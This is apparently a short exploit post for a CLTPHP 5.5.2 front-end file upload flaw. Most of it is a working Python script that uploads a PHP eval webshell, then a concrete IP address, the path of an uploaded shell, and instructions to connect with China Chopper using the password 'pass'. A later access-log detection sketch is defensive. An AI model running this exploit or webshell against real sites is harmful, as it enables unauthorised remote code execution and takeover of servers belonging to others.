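CLTPHP is a business system built on ThinkPHP. Versions before 5.5.3 contain a file upload vulnerability that allows getshell from the front end.
Prepare a CLTPHP 5.5.2 environment.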

payload
import requests
import sys

def CLPHP_upload(url):
    header = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'X-Requested-With': 'XMLHttpRequest',
    }
    geturl = url + "/user/upFiles/upload"
    files = {'file': ('1.php', '<?php eval($_POST["pass"]) ?>', 'image/jpeg')}
    res = requests.post(geturl, files=files, headers=header)
    print(res.text)

if __name__ == "__main__":
    if len(sys.argv) == 2:
        url = sys.argv[1]
        CLPHP_upload(url)
        sys.exit(0)
    else:
        print("usage: %s www.xxx.com" % sys.argv[0])
        sys.exit(-1)
Then simply run the command:

Then connect to the shell. The path is:
http://144.76.229.248:8002/public/ + the upload path
http://144.76.229.248:8002/public//uploads//20201010//38d7adcb21834c466b676cc3255cbc02.php
Connect with China Chopper (菜刀); the password is pass.
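
On the defending side, the two requests above leave a recognisable trace in the web server's access log: a POST to /user/upFiles/upload, then a request for a script file under /public/uploads/ (possibly with doubled slashes, as in the URL above). The following detection sketch is an added example, not part of the original post; it assumes combined-format access logs, and the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not from the original page.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2020:10:01:02 +0000] "POST /user/upFiles/upload HTTP/1.1" 200 98 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Oct/2020:10:01:09 +0000] "POST /public//uploads//20201010//0123abcd.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"
198.51.100.4 - - [10/Oct/2020:10:02:00 +0000] "GET /public/uploads/20201010/avatar.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2020:10:03:00 +0000] "POST /user/upFiles/upload HTTP/1.1" 200 97 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)

def normalize(target):
    """Drop the query string, percent-decode, collapse repeated slashes, lowercase."""
    path = unquote(target.split('?', 1)[0])
    return re.sub(r'/{2,}', '/', path).lower()

def analyze(log_text):
    """Return requests for script files under the upload directory.

    Each finding records whether the same client IP had earlier POSTed to the
    upload endpoint, which is the sequence described on this page.
    """
    uploaders = set()
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method, target, status = m.groups()
        path = normalize(target)
        if method == "POST" and path.rstrip('/') == "/user/upfiles/upload":
            uploaders.add(ip)
        elif path.startswith("/public/uploads/") and SCRIPT_EXT.search(path):
            findings.append({"ip": ip, "time": ts, "path": path,
                             "status": int(status),
                             "uploaded_first": ip in uploaders})
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Any hit is worth investigating on its own, since an upload directory should never serve executable scripts; a hit with `uploaded_first` set matches the full sequence.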

That's about it......